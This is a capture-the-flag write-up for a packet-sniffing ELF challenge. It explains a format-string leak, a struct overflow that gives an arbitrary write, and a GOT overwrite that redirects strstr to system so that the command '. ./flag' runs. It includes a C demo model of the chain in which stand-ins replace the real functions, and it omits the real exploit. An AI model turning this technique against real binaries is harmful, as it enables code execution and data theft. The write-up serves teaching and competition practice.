This challenge was solved, and the write-up written, by one of my teammates, tukan.
We were given an x64 ELF binary and the corresponding libc. It had most protections enabled, but its .got entries were still writable (no Full RELRO), which is what makes the GOT overwrite below possible.
Reversing the challenge revealed that:
the binary sniffs traffic via libpcap.
it processes only ICMP and TCP port 80 traffic.
the ICMP handler contains an information leak via a format string bug.
the TCP handler contains a buffer overflow inside the structure allocated per TCP connection; the overflow reaches pointer fields that are later used as destination addresses of memcpy calls whose source data we control, which gives an arbitrary write.
The relevant parts of the struct:
The exploitation plan is as follows:
leak pointers into libc and into the binary from the stack using the format string bug in the ICMP handler.
overwrite the username pointer in the connection struct with the address of the strstr .got entry.
overwrite the strstr .got entry with the address of system from libc, using the memcpy whose destination is now the corrupted username pointer; strstr is called on attacker-controlled data in the TCP handler, so from then on that call is system(attacker data).
read the flag using the shell command ". ./flag": sourcing the flag file makes sh try to execute its contents as a command, so the resulting "not found" error message contains the flag, and that message goes to stderr, which the binary sends back to us.
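To make steps 2 and 3 of the plan concrete, here is an added C model of the write primitive and the GOT hijack. It is illustration code, not the challenge binary and not the original exploit. The struct layout, the request framing and the names handle_data, handle_username, handle_search, got_strstr and fake_system are assumptions: a process-local function pointer stands in for the writable .got entry of strstr, and a recording function stands in for libc's system(), so the program runs and can be checked without a shell or the real target.

```c
/* Added illustration of the overflow -> arbitrary write -> GOT hijack chain.
 * Everything below is assumed for the demo, not taken from the challenge. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for the writable .got entry of strstr. Under Partial RELRO the real
 * slot is exactly this: a writable pointer that every strstr() call goes through. */
static char *(*got_strstr)(const char *, const char *) = strstr;

/* Stand-in for libc's system(). On x86-64, system() reads only its first
 * argument (rdi), which is why the real exploit can reach it through the strstr
 * slot; the stand-in takes strstr's signature so the call is well-defined C, and
 * records the command instead of spawning a shell. */
static char last_command[64];
static char *fake_system(const char *cmd, const char *ignored)
{
    (void)ignored;
    snprintf(last_command, sizeof last_command, "%s", cmd);
    return NULL;
}

/* Assumed per-connection structure: a fixed buffer followed by the pointer that
 * a later request uses as a memcpy destination. */
struct conn {
    char data[32];
    char *username;
    size_t username_len;
};

/* Request type 1: copies attacker bytes into data with an attacker-chosen length.
 * The bound is deliberately the whole struct rather than sizeof data, so an
 * oversized request overwrites username (kept inside the allocation so the demo
 * itself stays well-behaved). */
static int handle_data(struct conn *c, const unsigned char *pkt, size_t len)
{
    if (len > sizeof *c - offsetof(struct conn, data))
        return -1;
    memcpy((unsigned char *)c + offsetof(struct conn, data), pkt, len);
    return 0;
}

/* Request type 2: stores a "username" through the pointer, which after the
 * overflow points wherever the attacker chose: an arbitrary write. */
static void handle_username(struct conn *c, const unsigned char *pkt, size_t len)
{
    c->username_len = len;
    memcpy(c->username, pkt, len);
}

/* Request type 3: the handler searches attacker data with strstr(), reached
 * through the (now corrupted) GOT slot. */
static char *handle_search(const char *request)
{
    return got_strstr(request, "GET ");
}

/* The three-request sequence from the plan above, run against the model. */
static const char *run_exploit(void)
{
    struct conn c;
    unsigned char pkt1[sizeof c.data + sizeof(char *)];
    unsigned char pkt2[sizeof(char *)];
    char *slot = (char *)&got_strstr;                       /* "GOT entry" address */
    char *(*target)(const char *, const char *) = fake_system; /* "system" address */

    memset(&c, 0, sizeof c);
    c.username = c.data;                                    /* harmless initial value */

    /* 1. Overflow data: 32 filler bytes, then the slot address lands on username. */
    memset(pkt1, 'A', sizeof c.data);
    memcpy(pkt1 + sizeof c.data, &slot, sizeof slot);
    handle_data(&c, pkt1, sizeof pkt1);

    /* 2. "Set username": the bytes of system's address are written into the slot. */
    memcpy(pkt2, &target, sizeof target);
    handle_username(&c, pkt2, sizeof pkt2);

    /* 3. The next strstr() on attacker data is now system(attacker data). */
    handle_search(". ./flag");
    return last_command;
}

int main(void)
{
    printf("command reaching system(): %s\n", run_exploit());
    return 0;
}
```

Running it shows the request string that should have been searched arriving as the argument of the stand-in system(). Against the real target the slot address is the leaked binary base plus the offset of strstr's .got entry, and the value written is the leaked libc base plus the offset of system, which is why the format string leak has to come first.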
The flag was:
Exploit
(not stable, you probably have to run multiple times)